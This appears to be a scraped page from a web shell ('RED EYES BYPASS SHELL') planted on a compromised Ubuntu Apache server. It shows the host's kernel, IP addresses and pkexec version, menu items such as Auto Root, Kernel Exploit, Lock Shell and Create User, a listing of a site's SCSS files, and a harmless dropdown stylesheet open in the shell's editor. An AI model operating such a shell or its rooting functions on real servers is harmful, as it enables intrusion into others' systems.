Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
pdpa /
src /
scss /
free /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
forms
[ DIR ]
drwxr-xr-x
mixins
[ DIR ]
drwxr-xr-x
_accordion.scss
775
B
-rwxr-xr-x
_alert.scss
599
B
-rwxr-xr-x
_badge.scss
782
B
-rwxr-xr-x
_breadcrumb.scss
444
B
-rwxr-xr-x
_button-group.scss
822
B
-rwxr-xr-x
_buttons.scss
9.75
KB
-rwxr-xr-x
_card.scss
894
B
-rwxr-xr-x
_carousel.scss
475
B
-rwxr-xr-x
_close.scss
330
B
-rwxr-xr-x
_colors.scss
145
B
-rwxr-xr-x
_deprecated.scss
620
B
-rwxr-xr-x
_dropdown.scss
2.53
KB
-rwxr-xr-x
_flag.scss
23.05
KB
-rwxr-xr-x
_functions.scss
387
B
-rwxr-xr-x
_images.scss
1.11
KB
-rwxr-xr-x
_list-group.scss
1.24
KB
-rwxr-xr-x
_mixins.scss
198
B
-rwxr-xr-x
_modal.scss
74
B
-rwxr-xr-x
_nav.scss
1.53
KB
-rwxr-xr-x
_navbar.scss
587
B
-rwxr-xr-x
_pagination.scss
2.11
KB
-rwxr-xr-x
_popover.scss
262
B
-rwxr-xr-x
_progress.scss
47
B
-rwxr-xr-x
_range.scss
852
B
-rwxr-xr-x
_reboot.scss
183
B
-rwxr-xr-x
_ripple.scss
823
B
-rwxr-xr-x
_root.scss
87
B
-rwxr-xr-x
_scrollspy.scss
1.02
KB
-rwxr-xr-x
_shadows.scss
11
B
-rwxr-xr-x
_tables.scss
928
B
-rwxr-xr-x
_toasts.scss
689
B
-rwxr-xr-x
_tooltip.scss
351
B
-rwxr-xr-x
_type.scss
472
B
-rwxr-xr-x
_utilities.scss
4.42
KB
-rwxr-xr-x
_variables.scss
45.37
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _dropdown.scss
.dropdown-menu { color: $dropdown-color; margin: 0; padding-top: 0; padding-bottom: 0; border: 0; box-shadow: $dropdown-box-shadow; font-size: $dropdown-font-size; > li { border-radius: 0; &:first-child { border-top-left-radius: $dropdown-item-border-radius; border-top-right-radius: $dropdown-item-border-radius; border-bottom-left-radius: 0; border-bottom-right-radius: 0; .dropdown-item { border-top-left-radius: $dropdown-item-border-radius; border-top-right-radius: $dropdown-item-border-radius; border-bottom-left-radius: 0; border-bottom-right-radius: 0; } } &:not(:first-child):not(:last-child) { .dropdown-item { border-radius: 0; } } &:last-child { border-top-left-radius: 0; border-top-right-radius: 0; border-bottom-left-radius: $dropdown-item-border-radius; border-bottom-right-radius: $dropdown-item-border-radius; .dropdown-item { border-top-left-radius: 0; border-top-right-radius: 0; border-bottom-left-radius: $dropdown-item-border-radius; border-bottom-right-radius: $dropdown-item-border-radius; } } } &.animation { display: block; /* Speed up animations */ animation-duration: $dropdown-menu-animated-animation-duration; animation-timing-function: $dropdown-menu-animated-animation-timing-function; } } .dropdown-item { padding: $dropdown-item-padding-y $dropdown-item-padding-x; color: $dropdown-color; border-radius: 0; &:hover, &:focus { color: $dropdown-state-color; background-color: $dropdown-state-background-color; } &.active, &:active { color: $dropdown-state-color; background-color: $dropdown-state-background-color; } } .hidden-arrow { &.dropdown-toggle:after { display: none; } } .animation { animation-duration: 1s; animation-fill-mode: both; padding: auto; } @media (prefers-reduced-motion) { .animation { transition: none !important; animation: unset !important; } } @keyframes fade-in { from { opacity: 0; } to { opacity: 1; } } .fade-in { animation-name: fade-in; } @keyframes fade-out { from { opacity: 1; } to { opacity: 0; } } .fade-out { animation-name: fade-out; } .dropdown-divider { border-top: 2px solid $dropdown-divider-bg; opacity: 1; } .dropdown-menu { INPUT:not(:-webkit-autofill), SELECT:not(:-webkit-autofill), TEXTAREA:not(:-webkit-autofill) { animation-name: none !important; } }
Close